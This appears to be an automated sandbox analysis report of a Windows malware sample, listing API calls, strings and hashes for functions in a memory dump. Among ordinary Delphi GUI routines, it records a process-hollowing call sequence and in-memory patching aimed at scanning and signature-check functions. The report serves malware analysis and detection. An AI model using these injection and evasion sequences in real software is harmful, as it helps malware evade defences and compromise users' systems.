                                                                                                    • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                    • API String ID: 3397921170-3950384806
                                                                                                    • Opcode ID: b8ea0b0f01905477398549f48762f582577f768bc70b112c70165d84075dd70b
                                                                                                    • Instruction ID: 00793e46725d50ce741e565a6327dc6281d77a4e488e3db0c54270408c23e6be
                                                                                                    • Opcode Fuzzy Hash: b8ea0b0f01905477398549f48762f582577f768bc70b112c70165d84075dd70b
                                                                                                    • Instruction Fuzzy Hash: 0731ED75660344AFEB08FFA9E8D696AB7FCE744780F008465F6159B60AE7B498C4CF10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D4F94 Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetObjectA.GDI32(00000000,00000054,?), ref: 032D5014
                                                                                                    • GetDC.USER32(00000000), ref: 032D5025
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D5036
                                                                                                    • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 032D5082
                                                                                                    • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 032D50A6
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D5303
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 032D5343
                                                                                                    • RealizePalette.GDI32(?), ref: 032D534F
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 032D53B8
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 032D53D2
                                                                                                    • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,032D5560,?,00000000,032D5582,?,00000000,032D5593), ref: 032D541A
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 032D53A0
                                                                                                      • Part of subcall function 032D1D04: GetSysColor.USER32(?), ref: 032D1D0E
                                                                                                    • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 032D543C
                                                                                                    • CreateCompatibleDC.GDI32(00000028), ref: 032D544F
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D5472
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 032D548E
                                                                                                    • RealizePalette.GDI32(?), ref: 032D5499
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 032D54B7
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 032D54D1
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 032D54F9
                                                                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 032D550B
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D5515
                                                                                                    • DeleteDC.GDI32(?), ref: 032D5530
                                                                                                      • Part of subcall function 032D2AC0: CreateBrushIndirect.GDI32(?), ref: 032D2B6B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                                                    • String ID:
                                                                                                    • API String ID: 1299887459-0
                                                                                                    • Opcode ID: afa72441bce9856466aeedbe3c89418ac6ea2e7f86f4bf0457d9ec248bc6ecb7
                                                                                                    • Instruction ID: 21d91473af0863eb85293616927e6c818f6b755fb138172df81ded6805ad3500
                                                                                                    • Opcode Fuzzy Hash: afa72441bce9856466aeedbe3c89418ac6ea2e7f86f4bf0457d9ec248bc6ecb7
                                                                                                    • Instruction Fuzzy Hash: 6B12F975A20209AFDB11EFA8C884F9EB7F9EF09350F558455F918EB291C7B4E980CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D7E64 Relevance: 43.5, APIs: 8, Strings: 16, Instructions: 1478nativethreadprocessCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                      • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                      • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                      • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                      • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                      • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                      • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03330408,033303F8,OpenSession,033303D0,032D9728,ScanString,033303D0), ref: 032D82F1
                                                                                                    • GetThreadContext.KERNEL32(00000000,0333044C,ScanString,033303D0,032D9728,UacInitialize,033303D0,032D9728,ScanBuffer,033303D0,032D9728,ScanBuffer,033303D0,032D9728,OpenSession,033303D0), ref: 032D85E6
                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,03330520,00000004,03330528,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0), ref: 032D8843
                                                                                                    • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,00000000,-00000008,03330520,00000004,03330528), ref: 032D89BE
                                                                                                      • Part of subcall function 032CFB88: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032CFB95
                                                                                                      • Part of subcall function 032CFB88: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFB9B
                                                                                                      • Part of subcall function 032CFB88: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 032CFBBB
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,03330528,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,ScanBuffer,033303D0), ref: 032D8FA1
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,03330524,00000004,03330528,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,00000000,00000000), ref: 032D9114
                                                                                                    • SetThreadContext.KERNEL32(00000000,0333044C,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,00000000,-00000008,03330524,00000004,03330528), ref: 032D928A
                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,0333044C,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,00000000,-00000008,03330524), ref: 032D9297
                                                                                                      • Part of subcall function 032CFCE0: LoadLibraryW.KERNEL32(bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0,032D9728,UacInitialize,033303D0,032D9728,00000000,0333044C), ref: 032CFCF2
                                                                                                      • Part of subcall function 032CFCE0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 032CFCFF
                                                                                                      • Part of subcall function 032CFCE0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan), ref: 032CFD16
                                                                                                      • Part of subcall function 032CFCE0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0,032D9728,UacInitialize,033303D0), ref: 032CFD25
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryVirtual$LibraryProcessWrite$AddressCurrentProcThread$ContextFreeHandleLoadModule$AllocateCacheCreateFlushInstructionProtectReadResumeSectionUnmapUserView
                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                    • API String ID: 3001626006-1058128293
                                                                                                    • Opcode ID: 678d7968992d7a3460673fa9f52e32e44e064f8ad559b88b05a7a94403a0acb9
                                                                                                    • Instruction ID: 4bd27d006e4f883d8ddaf7fdd4c4726a668c72e55006c8e6e9e1438550ff325d
                                                                                                    • Opcode Fuzzy Hash: 678d7968992d7a3460673fa9f52e32e44e064f8ad559b88b05a7a94403a0acb9
                                                                                                    • Instruction Fuzzy Hash: 02D21D79A202189FDB15FB65DDD0BCEB3B9AF44740F1181A2E104AF216DBB1AEC58F44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 033031B4 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 405COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RegisterAutomation$vcltest3.dll
                                                                                                    • API String ID: 0-2963190186
                                                                                                    • Opcode ID: 2251e7e25a31b0f6c3b6f6a1577c0e00cec3d1eba38d1263d8e41cca6a53691c
                                                                                                    • Instruction ID: 01f38cb532da6bc47e63f3df6076d69b6df4efa2f86064f8bd1c476eb61ab0f8
                                                                                                    • Opcode Fuzzy Hash: 2251e7e25a31b0f6c3b6f6a1577c0e00cec3d1eba38d1263d8e41cca6a53691c
                                                                                                    • Instruction Fuzzy Hash: C8E14F3DA04204EFDB14DBA9C9E4A9EF7B5AF49361F1881E5E4459B7A1C734EE84CB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B5C18 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5C35
                                                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 032B5C4C
                                                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 032B5C7C
                                                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5CE0
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5D16
                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5D29
                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5D3B
                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5D47
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000), ref: 032B5D7B
                                                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18), ref: 032B5D87
                                                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 032B5DA9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                    • Opcode ID: 980d73ece5758f1adf3b4164e84bf712cd93b81a5b8db27408bc7cae6302f6b1
                                                                                                    • Instruction ID: f1d84881b6dc4974f126d8da1f2ed3edf056a6abd4f42859340214de243b5bc6
                                                                                                    • Opcode Fuzzy Hash: 980d73ece5758f1adf3b4164e84bf712cd93b81a5b8db27408bc7cae6302f6b1
                                                                                                    • Instruction Fuzzy Hash: B141A275D2066AAFDB10DEE8CC88ADFB3BDEF49380F1445A5A154DB240D770AED48B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032FFCF0 Relevance: 20.0, APIs: 13, Instructions: 450COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2948472770-0
                                                                                                    • Opcode ID: 0e96521bc7d61e2baa9f060a13760773cea95cf5f4dfbfd60000b1544d1f65ca
                                                                                                    • Instruction ID: e6b9a38934569b78719759192b50ecfe35d9ff2ef2b590a1af4c452d8ec3b3a3
                                                                                                    • Opcode Fuzzy Hash: 0e96521bc7d61e2baa9f060a13760773cea95cf5f4dfbfd60000b1544d1f65ca
                                                                                                    • Instruction Fuzzy Hash: 38021F39A14244EFDB55EBA8CAD4F9DB7F8AB04300F5941E0F504AB3A2D775AE80DB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B5EE8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 032B5EF8
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 032B5F05
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 032B5F0B
                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 032B5F36
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032B5F7D
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032B5F8D
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032B5FB5
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032B5FC5
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 032B5FEB
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 032B5FFB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1599918012-2375825460
                                                                                                    • Opcode ID: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
                                                                                                    • Instruction ID: d8d77b2abaec448e52e3b6fb0cf959862133fe9b4c810bce088ac74bc9a21b7c
                                                                                                    • Opcode Fuzzy Hash: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
                                                                                                    • Instruction Fuzzy Hash: 55318675E2026D29FF26D5B8DC46BEEB7BC5B043C0F0845E19644EA181D6B49AD48B90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032F2264 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 032F2273
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 032F2290
                                                                                                    • GetWindowRect.USER32(?), ref: 032F22A9
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 032F22B7
                                                                                                    • GetWindowLongA.USER32(?,000000F8), ref: 032F22CC
                                                                                                    • ScreenToClient.USER32(00000000), ref: 032F22D9
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 032F22E4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 2266315723-3772416878
                                                                                                    • Opcode ID: ebf521a3e82b7c8ce86d899e93d29d58912614867133c43a6224c217e64f485c
                                                                                                    • Instruction ID: 8c2231d3907e18fbee9b0ab85022709b29c05dc1e05afd3c098ac18b27651754
                                                                                                    • Opcode Fuzzy Hash: ebf521a3e82b7c8ce86d899e93d29d58912614867133c43a6224c217e64f485c
                                                                                                    • Instruction Fuzzy Hash: 1D113079524301AFCB10EF6CC984A8BB7E8AF89350F044965BE58DF246D775D8448B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E3E18 Relevance: 10.9, APIs: 7, Instructions: 405COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SaveDC.GDI32(?), ref: 032E40E8
                                                                                                    • RestoreDC.GDI32(?,?), ref: 032E415C
                                                                                                    • GetWindowDC.USER32(?,00000000,032E434C), ref: 032E41D6
                                                                                                    • SaveDC.GDI32(?), ref: 032E420D
                                                                                                    • RestoreDC.GDI32(?,?), ref: 032E427A
                                                                                                    • DefWindowProcA.USER32(?,?,?,?,00000000,032E434C), ref: 032E432E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: RestoreSaveWindow$Proc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1975259465-0
                                                                                                    • Opcode ID: f7368f26b618b2396db3831e508b7babd7511b6ba15f60d610b06f08c1322010
                                                                                                    • Instruction ID: e26a13852b176b36c5b503a023810f9e363afbfff67e1ef46ee1e4b0e8cbf6d4
                                                                                                    • Opcode Fuzzy Hash: f7368f26b618b2396db3831e508b7babd7511b6ba15f60d610b06f08c1322010
                                                                                                    • Instruction Fuzzy Hash: B5E14038A20209DFCB10EFAAC48199EF7F5FF98300BA985A5E555AB714D770ED81CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032FC520 Relevance: 10.8, APIs: 7, Instructions: 332windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: RestoreSave$FocusWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1553564791-0
                                                                                                    • Opcode ID: 52a2500966fc439c07e0efee1e243f576fd145b2fc175eeeb193c9ef6552d789
                                                                                                    • Instruction ID: 166adc152b2e25eeaefa5a0a7472be26a240e57141b5fe6bfbd454aed8208490
                                                                                                    • Opcode Fuzzy Hash: 52a2500966fc439c07e0efee1e243f576fd145b2fc175eeeb193c9ef6552d789
                                                                                                    • Instruction Fuzzy Hash: 3BC18E35A2421DDFDB14EB68C985ABEF3F5EB44300F5940B1E549AB255CB70EE82CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CFCE0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0,032D9728,UacInitialize,033303D0,032D9728,00000000,0333044C), ref: 032CFCF2
                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 032CFCFF
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan), ref: 032CFD16
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0,032D9728,UacInitialize,033303D0), ref: 032CFD25
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                    • Opcode ID: 9c0331ecc18621830deb80fafc78ef70a2fb69f44d9da6e652ded26041c08f51
                                                                                                    • Instruction ID: ba603ea36d14be8e4910d07c31ce536e67fa0ea6481aca7a0cf09ec29c3ea48a
                                                                                                    • Opcode Fuzzy Hash: 9c0331ecc18621830deb80fafc78ef70a2fb69f44d9da6e652ded26041c08f51
